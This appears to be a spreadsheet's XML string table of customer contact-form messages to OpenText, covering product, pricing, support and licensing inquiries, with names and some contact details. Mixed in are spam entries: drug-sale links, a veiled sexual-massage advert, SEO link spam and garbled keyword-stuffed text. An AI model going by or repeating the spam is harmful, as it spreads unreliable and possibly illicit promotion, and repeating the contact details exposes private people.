Thanks for help. _x000D_
Regards Jiri Pazdera</t>
  </si>
  <si>
    <t>Call me</t>
  </si>
  <si>
    <t>Our company is intrested for your product Gupta Report Builder. Purpose is editing report templates for Oracle Materials Control. _x000D_
Price for license also._x000D_
Regards,_x000D_
Aleksandar Jelovac</t>
  </si>
  <si>
    <t>Good afternoon!_x000D_
Tell me who we can contact to get the cost of technical support for your product.</t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour_x000D_
_x000D_
Nous nous permettons de vous contacter afin de vous proposer un RFI portant sur la mise en place d’une solution GED permettant l’archivage et le partage de documents et de mails pour notre Direction Juridique._x000D_
_x000D_
Le RFI sera lancé le 20 Novembre._x000D_
_x000D_
Quelques mots sur le sujet :_x000D_
•	La solution doit permette aux juristes  : _x000D_
–	de CONSERVER leurs documents de travail selon un PLAN DE CLASSEMENT COMMUN qui tiendra compte des spécificités de leurs différentes activités._x000D_
–	de PARTAGER des documents de travail à jour soit entre collègues au sein d’un même département/pole (par exemple en cas de reprise de dossiers pendant l’absence d’un juriste) soit entre plusieurs départements/pôles en cas de projet transverse._x000D_
–	de partager et conserver des EMAILS au même titre que des autres documents bureautiques (word, pdf …) _x000D_
–	de RETROUVER facilement les documents au moyen d’outils de recherche simples et efficaces prenant en compte non seulement le titre mais aussi le contenu des documents._x000D_
_x000D_
La solution doit être ERONOMIQUE, SIMPLE et alimentée en continu au fur et à mesure que les juristes travaillent sur leur dossiers_x000D_
_x000D_
Nous avons également des contrats de sécurité fort._x000D_
_x000D_
Pensez-vous pouvoir nous accompagner sur ce besoin ?_x000D_
_x000D_
_x000D_
Excellente journée _x000D_
_x000D_
Cordialement	_x000D_
_x000D_
 _x000D_
Alexia BLACHON_x000D_
Acheteuse Prestation &amp; Produits IT_x000D_
Direction Achat_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>We are beginning to look at Content Management Systems &amp; a couple of our Departments use LiveLink so I am interested in finding out more about Records Management functionalities.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello OpenText,_x000D_
_x000D_
I am looking for company that could help me to build a data center._x000D_
_x000D_
Please advise._x000D_
_x000D_
Could  you come over to our office some time next week to present your solution?_x000D_
_x000D_
Thanks and BR,_x000D_
Eddy </t>
  </si>
  <si>
    <t xml:space="preserve">Афинитор (Эверолимус) 5 мг №30, таблетки Afinitor (Everolimus) 5 mg №30 Cтоимость, цена, купить, отзывы, отзывы пациентов _x000D_
 _x000D_
[url=http://india-med.net/anticancer]Jakavi (Джакави) - Ruxolitinib (Руксолитиниб)[/url]_x000D_
 _x000D_
&lt;a href=http://india-med.net/lucius-pharmaceuticals-onko&gt;LuciCaboz-дженерик Кометрик-Cabozantinib Купить, стоимость, цена, отзывы пациентов&lt;/a&gt;_x000D_
 _x000D_
&lt;a href=http://india-med.net&gt;гепцинат lp&lt;/a&gt;_x000D_
 _x000D_
[url=http://india-med.net]гепцинат лп купить в украине[/url]_x000D_
</t>
  </si>
  <si>
    <t>Looking at evaluating OTMM for a PoC to a Banking Client and subsequently put up a proposal for Enterprise wide Deployment.</t>
  </si>
  <si>
    <t>I'd like to speak to someone about the Rightful Express appliance. I serve as an MSP and I have a client where I'm considering deploying something like this.</t>
  </si>
  <si>
    <t>Visitors to room can find many questionnaires lady of any age and nationality performing body rub massage in the city New York. Prices for japanese massage depends on qualification Women and the skills that she possesses. _x000D_
 _x000D_
 We train all masseurs and therefore they are all proffessionals of their business.  They are constantly Improve their skills.  All girls  beautiful.  _x000D_
 _x000D_
 To quickly restore strength, relieve stress and improve your health , than a quality and professional therapeutic massage or classical massage  There are many kinds in the world Massage. There is a huge choice of massage. There are many good and useful types of massage in the world. _x000D_
 _x000D_
Before making a choice, carefully study the prices for services and customer feedback about the work of one or another masseur specialist. We are sure that the search for a real professional masseur will be crowned with success and you will be satisfied with the quality of our services. Masseurs are skilled workers in their field and they will help you relax after a hard day. _x000D_
 _x000D_
Masseuses are able not only to give pleasure in this way, but also to the strong semi-gentlemen. Girls perform japanese a massage that will produce a On you a vivid impression. _x000D_
 _x000D_
Our Studio in NYC. : [url=https://manhattan-massage.com]massage nyc[/url]</t>
  </si>
  <si>
    <t>Enquire on Right Fax Solutions available. Costs on the different Right Fax Products available and is there a trial version to test?</t>
  </si>
  <si>
    <t>I can not reach my sales rep Michelle O'brien - we have been waiting on an answer for weeks and I can not get ahold of anyone here, please help or we will gladly take our current business elsewhere...</t>
  </si>
  <si>
    <t>Needing information about ApplicationXtender for our Veterans Services Department for scanning documents.</t>
  </si>
  <si>
    <t>basic stand alone products for immediate post call survey options and quality assurance automation.</t>
  </si>
  <si>
    <t>Need password reset to access a document</t>
  </si>
  <si>
    <t xml:space="preserve">Hi.  We have a start up company that has a 'learn to read' teaching program for challenged readers.  Part of the teaching course is digital and part is a hard copy kit.  We would like to send a flash drive with the kit but want to insure that it cannot be replicated or shared on other devices and has a duration of 90 days.  Is that something you can help with?  Our initial test is with 100 units.  </t>
  </si>
  <si>
    <t>Interested in a college wide intranet solution for collaboration, file sharing, group chats, announcements, etc.</t>
  </si>
  <si>
    <t xml:space="preserve">I work with the branded content group at FORTUNE.  Currently, I am developing a special advertising section with a focus on The Industrial Internet Revolution for our February/FORTUNE/Most Admired Companies issue._x000D_
_x000D_
Who would I talk to at OpenText to explore any interest on being part of the project?_x000D_
_x000D_
I would be happy to send more information._x000D_
_x000D_
Regards,_x000D_
_x000D_
Jack Hemple_x000D_
Branded Content Consultant_x000D_
FORTUNE/Time Inc._x000D_
jhemple@bex.net_x000D_
+1-419-450-7568_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We have open text 14. Is it compatible with windows 10. If not, what version is ? What is the cost of upgrading ? Serial number is 1305119. </t>
  </si>
  <si>
    <t>Для того, чтобы нанести гидроизоляционный слой на уже готовую бетонную конструкцию, используют специальные виды бетонов, которые обладают быстрой схватываемостью и водонепроницаемостью, читайте об этом подробнее на сайте [url=http://beton-cement-ru.ru]beton-cement-ru.ru[/url]</t>
  </si>
  <si>
    <t>Для питьевой воды лучше всего приобретать картриджи с пропускной способностью на 5 или 1 микрон, подробнее об этом читайте на сайте [url=http://dumainfo.ru]dumainfo.ru[/url]</t>
  </si>
  <si>
    <t>I would like to discuss your document management solutions and schedule a demo.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi there and thank you for taking the time to read my message._x000D_
I'm producing a marketplace analysis of regulated content management systems for a current (life sciences) client and would like to understand the following: a) product capabilities; b) pricing model; c) out-of-the-box integrations; d) compliance codes adhered to. I hope you can provide this. Just to stress, this isn't a sales lead at this stage so I'm only keen on hearing facts. I trust this is acceptable._x000D_
Thanks again for any assistance you can provide. I appreciate it. </t>
  </si>
  <si>
    <t>Приветствую всех! класный у вас сайт! _x000D_
Зацените, нашёл супер базу кино онлайн в хорошем качестве: [b] лучшие мелодрамы онлайн [/b] [url=http://kinofanonline.ru/]http://kinofanonline.ru/[/url] _x000D_
Здесь: http://kinofanonline.ru/melodrama/ [b] хорошие мелодрамы онлайн бесплатно [/b] _x000D_
[url=http://kinofanonline.ru/multfilmy/] смотреть лучшие мультфильмы 2016 [/url] _x000D_
[url=http://kinofanonline.ru/uzhasy/1257-prizrachnyy-reys-407-dark-flight-3d-2012.html] Смотреть Призрачный рейс / 407 Dark Flight 3D (2012) онлайн бесплатно [/url] _x000D_
http://kinofanonline.ru/uzhasy/4649-povorot-ne-tuda-6-posledniy-kurort-wrong-turn-6-last-resort-2014.html [b] Смотреть Поворот не туда 6: Последний курорт / Wrong Turn 6: Last Resort (2014) онлайн бесплатно [/b] _x000D_
http://kinofanonline.ru/drama/1840-vo-vse-tyazhkie-breaking-bad-5-sezon-ch-2-2013.html</t>
  </si>
  <si>
    <t xml:space="preserve"> Acatwho ispeeingin places other than the litter box may have a medical rpoblem,, a behsvioral issue, or both and it's important to see your  andfurniture- help!   Your browser indciates if you''ve visited this link&lt;/i&gt;.&lt;br&gt; &lt;h4&gt;17 Basic Differences BetweenDogPeople AndCatPeople ... Your browser indicates if you've visited this link&lt;/h4&gt;.&lt;br&gt;  _x000D_
 [url=http://63exelprop-soxz.soup.io/]Animal repellent cats[/url] [url=http://ceomalabajv.soup.io/]Feliway spray costo[/url]  _x000D_
 Spayed female dogs are at an increased risk of hypothyroidism. Current research Various ... Female neutered cat. poulard Female spayed chicken. [citation needed].&lt;br&gt; How to get rid ofdogurinesmells from carpet. ... If thd area is still wet you should first attempt to absorb thedogurine . Leaving it there to dry out will only  to GetUrineOutofCarpet -  Your browser indicates if you've visited this link&lt;/i&gt;.&lt;br&gt;  _x000D_
do neutered male cats still mate _x000D_
 _x000D_
 3/27/2012.&lt;br&gt; Pet Corrector 200 MlBadBehaviorSprayoff  - eBay Your browser indicates if you've visitde this link Find great deals for Pett Corrector 200 MlBadBehaviorSprayoff BarkDogPuppy Training. Shop wigh confidence on eBay!   More results.&lt;br&gt;  _x000D_
  [url=http://8inmesan-boo1.soup.io/]Acrylic aerosol paint[/url] [url=http://808guemencu-sodb.soup.io/]Cat neutering near me[/url]  _x000D_
 Why Does MyCatPee on MyBed ?  CANIDAEВ® Your browser indicates if you've vistied this link Why Does MyCatPee on MyBed ? ... Youcatmay pee on  In homes with multiplecatsor those with an intimidating or bothersomedog , yourbedprovides a ...  b/log/2017/06//why-does-my-cat-pee-on-my-bed/ More results.&lt;br&gt; 29 Sep 2017 ... Powerful Microorganisms Consume Urine Components! ... Spray it with Urine Off and completfely remove those urine stains. Powerful  Off вЂ“ Premium Stain and Odor Technology&lt;/i&gt;.&lt;br&gt;  _x000D_
cat urine out of leather _x000D_
 _x000D_
Hwo toRemoveUrinefromMattress- Buzzle Your browser indicates if you've visited this link If you are new to motherhood, you might be wondxering h</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;u&gt;How to MakeCatsStopl Pooping inFlowerBedsand Gardens Your browser indicates if you've visited this link&lt;/u&gt;.&lt;br&gt; As the numebr one producer of tinplate aerosol cans, we merge our unique decorating capabilities with the latdst aerosol technologies to create packaigng that not  Aerosol Cans  Products  McKernan Packaging Clearing House &lt;/i&gt;.&lt;br&gt;  _x000D_
 [url=http://imabompexv.soup.io/]Soft toys for cats[/url] [url=http://05theogenefus0.soup.io/]Cat litter box problems[/url]  _x000D_
 Compare 405 cat train set products at  including Babu Boys' Hero In Training Sweatshirt and Printed Jogger Set - Cat &amp; Jack Gray/Red NB, Gray Red, Baby  Caterpillar Toys Construction Express Train - Sears &lt;/i&gt;.&lt;br&gt; &lt;h3&gt; Cat Problems - Petfinder &lt;/h3&gt;.&lt;br&gt;  _x000D_
cat meowing for food _x000D_
 _x000D_
 &lt;u&gt;CatsPeeing /Pooping in the House  Berkeley Paernts Network Your browser indicates if you've visited this link&lt;/u&gt;.&lt;br&gt; Cats do their business inlitteerboxes, so you need a good one to keep yourkittyhappy and healthy. These are thebestlitterboxes you can  Bad? EliminateLitterBoxOdor Your browser indicates if you've visited this link&lt;/i&gt;.&lt;br&gt;  _x000D_
  [url=http://0florexfi-neti.soup.io/]Cat coming home[/url] [url=http://4alimmasatk.soup.io/]Blue mouse cat toy[/url]  _x000D_
 CatUrineRemover&amp; Cleaner: Get Rid ofCatUrineSmell - Petco Your browser indicates if you've visited this link Accidents happen, but Petco makes clean up easy. Removecaturine&amp; get rid ofurinesmell with a variety ofcaturinecleaners tht are safe &amp; effective.   More results.&lt;br&gt; 14 May 2013 ... But in the meantime, if you do find urine on the new chaise lounge, don't fret. We' re sharing 10 tips for claening cat urine and preventing  Tips for Cleaning Cat Urine  Animal Planet&lt;/u&gt;.&lt;br&gt;  _x000D_
cat admission _x000D_
 _x000D_
HowtoStopaCatFromUrinating on a Rug. Part of the series: Understanding YourCat . Stopping acatfromurinating on a rug is something that you need to do by  on a Rug  eHow Your browser idnicates if you've visited this link&lt;/h4&gt;.&lt;br&gt; &lt;h2&gt;Malevs . Femalecats Th</t>
  </si>
  <si>
    <t>Tried setting up support login acct, keep getting errors creating acct.</t>
  </si>
  <si>
    <t>Does Fax2Mail work with Office 365 ?</t>
  </si>
  <si>
    <t xml:space="preserve">CNL has purchased the EIM suite and would like to have any relevant details in relation to Cyber Security Incident Response.  Any known vulnerabilities of this product would help expedite our Incident response efforts. </t>
  </si>
  <si>
    <t xml:space="preserve">I work for City of New York, we have enterprise license and support agreement with Open text, I want to send two of my support engineers for training for the below given courses and would like to get a quote, so that I could send it for budget approval_x000D_
1.	3-7523 TeamSite System Administration (covers sysadmin tasks)_x000D_
2.	4-7527 TeamSite Advanced Development (covers the full extent of how we develop &amp; deploy TeamSite components)_x000D_
https://www.opentext.com/training/coursedetails.html?id=2372_x000D_
</t>
  </si>
  <si>
    <t>We are looking to receive and send fax from our third party tool. We are looking for secured HIPPA compliance cloud based faxing.</t>
  </si>
  <si>
    <t>I have been task with procuring a renewal for OpenText Exceed Maintenance, but am running into issues linking the new renewal to existing  contract#, serial#, OR SUID as previous vendor never provide. Hoping you can help me to locate or how to tell technical staff to locate. _x000D_
_x000D_
Thank you,</t>
  </si>
  <si>
    <t>I am writing to request a W-9 form for Open Text Inc. _x000D_
Thank you</t>
  </si>
  <si>
    <t xml:space="preserve">To whom it may concern:_x000D_
I work with a Data Team within 3M and we are currently updating our system. With that said, we require for all suppliers and/or entities we remit payment to, to have a copy of their W9 on file as well as an email address. Therefore, I would like to request a copy of the W9 for Open Text Corporation, which could either be sent to me via email or faxed to: 651-736-2275. The email address could be for either accounting or general inquiries_x000D_
If you have any questions, please feel free to contact me._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Hi there, I have been tasked by my director to find a redundant back up for our fax services. We need to ensure that we are never without fax services, but need to ensure that your services are secure fax and PHIPA compliant. If you would be so kind as to let me know that I would really appreciate it. _x000D_
_x000D_
Best Regards, _x000D_
_x000D_
Patrick Gabriel</t>
  </si>
  <si>
    <t>As HPE Software, now Micro Focus I support customers with Cardiff Teleform (HPE Teleform), which is now Opentext Teleform. I have a customer wishing to upgrade from 10.9.2, but I need to confirm some details. 1. What is the latest version? 2. Does it include HPE (MF) Content Manager 9.x release? 3. What are the license implications to going from 10.9.2 to latest version? 4. Where can I find more information, including Technical detail re Opentext Teleform?. Happy to discuss. Many thanks</t>
  </si>
  <si>
    <t xml:space="preserve">I am trying to download xplore software for windows but not able to get link to open._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking for a replacement for our current fax system.  </t>
  </si>
  <si>
    <t>We are currently using Right Fax in another area of the organization and We are looking at the Upgrade of our current Zoll Suite of applications. The suite is currently using 4 analog lines and a fax board. We would like to move this to a VM with Right Fax. Zoll said that they only support etherFax. Do you know if Right Fax will work with Zoll and if so do you have any white papers on how to set this up?</t>
  </si>
  <si>
    <t>I have a business unit interested in replacing their current DAM product, however there are broader corporate needs for general document management that should be considered. Would like to review our use cases and see where your products might fit.</t>
  </si>
  <si>
    <t xml:space="preserve">Interest in documentum for an IT pilot DMS. </t>
  </si>
  <si>
    <t>Does this product work with Office 365 ?</t>
  </si>
  <si>
    <t>Team at OpenText,_x000D_
_x000D_
I wanted to share some further information on our next Enterprise Transformation Summit: Blueprint for Commercial Success on the 10th July in London at the America Square Conference Centre._x000D_
_x000D_
I would like to invite you and the team to attend or sponsor to work with our senior management delegates._x000D_
_x000D_
We will be looking at providing a platform for business and industry leaders to discuss and debate the latest technological advances that are further pushing the boundaries on transforming businesses. This is putting organisations under mounting pressure to stay ahead of the curve with their digital adoption while keeping their customers at the heart of the business._x000D_
With the need for organisations to place greater emphasis on customer and employee experiences and engagement through newly adopted technologies, this is creating massive challenges to continue company growth and maintain wallet share. _x000D_
_x000D_
With these mounting pressures and needs Open Forum Events will be looking at inviting and uniting Chief Digital Officers, Chief Technology Officers and Directors, Heads &amp; VP’s of Digital Transformation, Innovation, and Strategy from across industries to offer valuable and actionable insights required to implement a successful and seamless forward plan that will help ensure sustainability and growth._x000D_
_x000D_
When would be a good time to schedule a call to discuss participation further?_x000D_
_x000D_
Best,_x000D_
Ali</t>
  </si>
  <si>
    <t>We own and use RightFax, we are looking for a way from a mobile phone to email a document to our fax server to have it faxed.</t>
  </si>
  <si>
    <t>What is invoice 900216652 for?</t>
  </si>
  <si>
    <t>Need a price quote for OpenText Exceed.  It will be installed on Citrix to be used by 50 named users where at most 10 concurrent users at a time.  Please communicate via email as much as possible.  Thank you!</t>
  </si>
  <si>
    <t>I work for Alitek Consulting (OT Partner) and wanted to find out the process for taking one of the certification exams online. Specifically, the Content Server Business Consultant Certification Exam v16.</t>
  </si>
  <si>
    <t>We are currently evaluating AP automation software to implement in 2018 and  would like to get a demo set up in the next couple weeks.</t>
  </si>
  <si>
    <t>When  accessing Teamsite application we are receiving below error._x000D_
"The Interwoven Web Daemon was unable to contact the Interwoven Servlet Engine. The Interwoven Servlet Engine may be down, or running on an unexpected host or port._x000D_
_x000D_
Please contact your system administrator." When we contacted open text team they told that Interwoven license has expired related to teamsite server.Could you please confirm and provide more information on the license renewal and when it got expired.We have the Below mentioned details ._x000D_
Company Name_x000D_
Thomson Legal &amp; Regulatory_x000D_
Company Entity ID_x000D_
91203</t>
  </si>
  <si>
    <t>Bom dia,_x000D_
Estamos buscando uma ferramenta de ECM para a MRS Logística e gostaríamos de conhecer o OpenText e ver como ele nos atenderia nos requisitos que já temos levantado. Por favor, podem me contactar para que eu possa mostrar os requisitos e agendarmos uma apresentação?_x000D_
_x000D_
Grata,_x000D_
Patrícia</t>
  </si>
  <si>
    <t>Team site is not working_x000D_
We are getting following error _x000D_
Caused by: javax.net.ssl.SSLHandshakeException: java.security.cert.CertificateException: invalid date: EMAILADDRESS=iwutild@interwoven.com, CN=iwutild.interwoven.com, OU=Engineering, O=Interwoven, L=Sunnyvale, ST=CA, C=US_x000D_
	at com.sun.net.ssl.internal.ssl.Alerts.getSSLException(Alerts.java:150)_x000D_
	at com.sun.net.ssl.internal.ssl.SSLSocketImpl.fatal(SSLSocketImpl.java:1518)_x000D_
	at com.sun.net.ssl.internal.ssl.Handshaker.fatalSE(Handshaker.java:174)_x000D_
	at com.sun.net.ssl.internal.ssl.Handshaker.fatalSE(Handshaker.java:168)_x000D_
	at com.sun.net.ssl.internal.ssl.ClientHandshaker.serverCertificate(ClientHandshaker.java:848)_x000D_
	at com.sun.net.ssl.internal.ssl.ClientHandshaker.processMessage(ClientHandshaker.java:106)_x000D_
	at com.sun.net.ssl.internal.ssl.Handshaker.processLoop(Handshaker.java:495)_x000D_
	at com.sun.net.ssl.internal.ssl.Handshaker.process_record(Handshaker.java:433)_x000D_
	at com.sun.net.ssl.internal.ssl.SSLSocketImpl.readRecord(SSLSocketImpl.java:818)_x000D_
	at com.sun.net.ssl.internal.ssl.SSLSocketImpl.performInitialHandshake(SSLSocketImpl.java:1030)_x000D_
	at com.sun.net.ssl.internal.ssl.SSLSocketImpl.writeRecord(SSLSocketImpl.java:622)_x000D_
	at com.sun.net.ssl.internal.ssl.AppOutputStream.write(AppOutputStream.java:59)_x000D_
	at java.nio.channels.Channels$WritableByteChannelImpl.write(Channels.java:267)_x000D_
	at com.interwoven.hopi.HopiChannel.write(HopiChannel.java:333)_x000D_
	at com.interwoven.hopi.HopiContext.sendData_(HopiContext.java:792)_x000D_
	... 12 more_x000D_
Caused by: java.security.cert.CertificateException: invalid date: EMAILADDRESS=iwutild@interwoven.com, CN=iwutild.interwoven.com, OU=Engineering, O=Interwoven, L=Sunnyvale, ST=CA, C=US_x000D_
	at com.interwoven.hopi.HopiTrustManager.checkServerTrusted(HopiTrustManager.java:273)</t>
  </si>
  <si>
    <t xml:space="preserve">Responding to a bid in Lagos Nigeria. So I will be needing your Technical documentation, License cost, deployment and support cost. I will also appreciate to know if you have representatives in Nigeria.   </t>
  </si>
  <si>
    <t>Dental Awareness Campaign</t>
  </si>
  <si>
    <t>can you advise me if the FREE Brava! Reader is freeware or shareware. thank you</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren,_x000D_
 _x000D_
könnten Sie mir bitte hierzu ein Angebot inkl. Reseller Rabatt erstellen?_x000D_
 _x000D_
1x Gupta Report Builder 6.1, Single User_x000D_
 _x000D_
Lizenznehmer_x000D_
SOLLINGGLAS GmbH &amp; Co. KG_x000D_
Hinter den Höfen 2_x000D_
37691 Derental_x000D_
 _x000D_
Vielen Dank &amp; freundliche Grüße,_x000D_
 _x000D_
  _x000D_
Sophie Nehk 	 	 	 _x000D_
Key Account Manager 	 	 	 _x000D_
snehk@sos-software.com _x000D_
 	 	 _x000D_
Telefon DE: +49 7032 81461–63 	 	Telefon CH: +41 52 72807-38 	 _x000D_
———————————————————————————————————————————————————— _x000D_
 	 	 	 _x000D_
SOS Software Service GmbH 	 	SOS Software Service AG 	 _x000D_
Unterer Talweg 40 – 86179 Augsburg 	 	Bahnhofplatz 65 – 8500 Frauenfeld 	 _x000D_
DEUTSCHLAND 	 	SCHWEIZ 	 _x000D_
———————————————————————————————————————————————————— _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, I'am looking for a reseller who can support us for the product Content Server Suite in the Netherlands other than I.R.I.S. </t>
  </si>
  <si>
    <t>About the course: "Documentum D2 Configuration 2-8701"_x000D_
_x000D_
Hi,_x000D_
I´d like to participate in this cource but there is an issue..._x000D_
I see it's just possible to enter each modules two times and that is not a way I´m able to work. I need the possibility to access the modules online whenever I have the time to do it, for several reasons!_x000D_
_x000D_
Can you please help me with this, or I will not be able to participate in this course?_x000D_
_x000D_
Best regards_x000D_
Trond Skognes</t>
  </si>
  <si>
    <t>Hi Informative Graphics Corporation,_x000D_
_x000D_
I do UI, WordPress websites and mobile apps._x000D_
_x000D_
I am looking for work._x000D_
_x000D_
Examples of my work are below:_x000D_
http://hipinspire.com/_x000D_
_x000D_
Best,_x000D_
Marko</t>
  </si>
  <si>
    <t xml:space="preserve">Hej, _x000D_
_x000D_
Jag har nu försökt nå min Sales manager och KAM i tre veckor. _x000D_
Vi har registrerat oss på OpenText Communication center och skulle nu även vilja få tillgång till de forum som finns där. För att kunna det behövs diverse kontraktsinformation från OpenText. _x000D_
_x000D_
Vänligen supportera mig med full access till detta snarast. _x000D_
_x000D_
Tack på förhand. _x000D_
_x000D_
Med vänlig hälsning_x000D_
Ida Kapare </t>
  </si>
  <si>
    <t xml:space="preserve">I came across your website after searching for software companies on google.com._x000D_
_x000D_
And I was wondering if you would like to partner up?_x000D_
_x000D_
Basically what we do is make animated videos that are designed to promote your service online and increase your website conversion rate._x000D_
_x000D_
So I wanted to offer you a 30 second cartoon explainer video for your service for just $197. (including script/voiceover)_x000D_
_x000D_
All I ask in return is a quick testimonial if you like the video!_x000D_
_x000D_
If you are interested in this offer, you can find out more or get started at www.30secondexplainervideos.com/explainer-promo_x000D_
_x000D_
_x000D_
Or you can shoot me a quick email if you had any questions!_x000D_
_x000D_
Cheers, Travis Cole_x000D_
www.30secondexplainervideos.com/explainer-promo_x000D_
</t>
  </si>
  <si>
    <t>i'd like to know about pricing list of OpenText because our company is interesting in your product and will bring to use also support customer.</t>
  </si>
  <si>
    <t>I have already confirmed the registration by clicking on the link in my email. till now no response</t>
  </si>
  <si>
    <t>Популярные женские новости тут [url=http://laform.ru/]laform.ru[/url]</t>
  </si>
  <si>
    <t>We are a Startup We are looking like your company partnership for Project Outsource Please contact us On my E-mail ID or Mobile Number._x000D_
Thank you _x000D_
Regards,_x000D_
Vivekanand Choudhari</t>
  </si>
  <si>
    <t xml:space="preserve">I want to know the price of setting up a DAM or Media Management Portal for our intranet. </t>
  </si>
  <si>
    <t xml:space="preserve">Hi!_x000D_
_x000D_
My name is Jasmine and I am a Sponsorship Coordinator for Equithon. Equithon is a student-run hackathon that is hosted in University of Waterloo on the first weekend of May 4-6th 2018. We are a hackathon that brings over 500 students from all over the world to create solutions that tackle gender equality, mental health, access to education, along with other aspects of social inequality._x000D_
 _x000D_
One of our major goals include gender equality, and last year we achieved a 50/50 gender ratio between our hackers. We firmly believe that gender and social equality among companies is becoming a topic that requires addressing. We are looking to create a diverse and stimulating environment for all of our hackers._x000D_
 _x000D_
We believe that Opentext would be a great fit to be become a sponsor for our event as we believe that Opentext’s values align with our own.  I would appreciate it if we can set up time for a quick conversation to discuss Opentext’s involvement in Equithon 2018!_x000D_
_x000D_
Link to our page: https://equithon.org/ _x000D_
 _x000D_
Best regards,_x000D_
 _x000D_
Jasmine Jian_x000D_
</t>
  </si>
  <si>
    <t>Can you e-mail me a link for the 15-day Brava Reader trial? I've completed and submitted you on-line form 5 times now, but have yet to receive the link via automated e-mail. Can you assist? Thanks!</t>
  </si>
  <si>
    <t>We would like to purchase the software that was formerly known as Captaris - Alchemy. We'd like to use it to format / store our accounting reports. Please contact me with pricing and how / who to purchase from. Thank you.</t>
  </si>
  <si>
    <t>Cancel renewal Number 0040078838 for 2018.  We will not be using the TLW software in 2018.</t>
  </si>
  <si>
    <t>I have a question regarding training.  When Open Text courses are taught at the Munich Gasbrunn location, which languages are used? I see both German and English listed for the same dates.  Thanks in advance.</t>
  </si>
  <si>
    <t>Need more channels for our RightFAX system.</t>
  </si>
  <si>
    <t>Hi,_x000D_
Someone please contact me for ApplicationXtender license renewal ASAP._x000D_
2039013966_x000D_
-Laksh</t>
  </si>
  <si>
    <t>Hello H-R, _x000D_
_x000D_
I was working in 2007 for Nstein_x000D_
_x000D_
It's possible to have a letter of reference_x000D_
indicating the period and tasks?_x000D_
_x000D_
Thank you</t>
  </si>
  <si>
    <t>Please provide a current address for checks to be mailed to.  The current one PO Box 791247 is being returned as the Box has been closed per the US Postal Service and mail is no longer processed by Suntrust Bank - Baltimore.  Thank you Suzanne M.</t>
  </si>
  <si>
    <t>How long with the general WebTop Documentum 6.8 patch 28 support last for OpenText?  I would like to know a lot more information about this, can you please email me all information you have on the supportability of this version?</t>
  </si>
  <si>
    <t>I have left 3 messages and submitted this form last week.  What does it take to get someone to answer 2 quick questions (which were submitted on this form last week)?  The time it is taking me to constantly try to reach someone is far more than the time it will take to call me and answer my questions.  If my phone goes right into voice mail, please leave me a message with a direct # so I can call right back.</t>
  </si>
  <si>
    <t>I would like more information, demo and pricing for OpenText Analytics Designer and iHub.</t>
  </si>
  <si>
    <t>I work for SAP in the area supporting Open Text Invoice management and I'm a colleague of Thomas Haehr. Could you please provide me with access to the knowledge base similar to thomas.haehr@sap.com?_x000D_
Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
Would you be interested in acquiring Dental Professionals Email Database? Or possibly interested in updating your current client list?_x000D_
_x000D_
Our list includes:_x000D_
_x000D_
•	Dental Clinics list _x000D_
•	Dental Labs list_x000D_
•	Dental Pharmacies list_x000D_
•	Doctors of Dental Surgery list_x000D_
•	Endodontists list _x000D_
•	Oral Surgeons list_x000D_
•	Dental Surgeons list_x000D_
•	Orthodontists list_x000D_
•	Periodontists list_x000D_
•	Prosthodontists list _x000D_
•	Oral and Maxillofacial Surgeons list _x000D_
•	Pediatric Dentists list _x000D_
•	Dental Hygienists list _x000D_
•	Dental Assistants list _x000D_
•	Oral Radiologist list_x000D_
•	Implantologists list_x000D_
•	Oral Pathologists list etc_x000D_
	_x000D_
Our database includes verified email address along with multi channel marketing detail like NPI Number, company name, company website, contact name, contact title, address, phone, fax, SIC Code, employee size, revenue size, industry descriptions etc_x000D_
_x000D_
Among other services we offer: Global B2B list, custom list, Technology list, email appending and other data appending services._x000D_
_x000D_
Please let me know your interest and schedule for a quick call to discuss in detail. If there is someone else in your organization that I need to speak in this regard, I would be very grateful if you could provide their details or forward this email to him/her, thanks in advance for your help!_x000D_
_x000D_
Await your response…._x000D_
_x000D_
Best Regards,_x000D_
Amber Perrett_x000D_
www.krystalcommunication.com_x000D_
</t>
  </si>
  <si>
    <t>Hi all, _x000D_
Open text PDF has been deployed to all users on the network, however the application is showing A4 format as a printing preference, when printing from some Web-Based applications, the format is switched to Letter Extra Traverse (9.5" by 11") cropping the print. _x000D_
How can we push a fix to all desktops in order to avoid every single user having to change the settings themselves? _x000D_
_x000D_
Thank you, _x000D_
Nicola Federico</t>
  </si>
  <si>
    <t xml:space="preserve">I wanted to know what the cost of purchasing and integrating the case management software to my medium size charity. I am currently unable to disclose the name of the organisation, however, we are looking to purchase a case management software and wanted to get a benchmark of what you offer and at what sort of price. _x000D_
_x000D_
Many thanks, _x000D_
Tatiana </t>
  </si>
  <si>
    <t xml:space="preserve">Good day,  _x000D_
Would be interested to learn more about opentext's hosting services and web site management and possibly indicative pricing. _x000D_
_x000D_
Thank you, </t>
  </si>
  <si>
    <t>Последние женские новости здесь [url=http://logwoman.ru/]logwoman.ru[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">Would like access to documentation (was granted in the past), to support common customers (as Pre-sales) as current account settings do not allow this access anymore._x000D_
Thx. </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
View this email in your browser _x000D_
_x000D_
_x000D_
_x000D_
 _x000D_
Greetings &amp; Happy Holidays _x000D_
                                                   from Horizons Events Center. _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
     _x000D_
_x000D_
We are a full-service events destination centrally located just minutes from Downtown Atlanta at 4990 Jimmy Carter Boulevard in Norcross._x000D_
As you embark on a season of celebration and thanksgiving, we invite you to visit and book your corporate holiday event at our spacious and elegant site.  _x000D_
Horizons Events Center makes holiday planning stress-free with our premier amenities. They include:_x000D_
•	25,000 sq. ft. to accommodate the size and scope of your event._x000D_
•	Our signature “Diamond Room” holds up to 3,000 guests._x000D_
•	Two perfectly-sized conference rooms for small-scale gatherings._x000D_
•	Talented personalizes.d planners available to make your event a true success.  _x000D_
•	Professional, courteous and experienced staff._x000D_
•	Free parking with quick and easy access to I-85._x000D_
•	The latest in audiovisual technology._x000D_
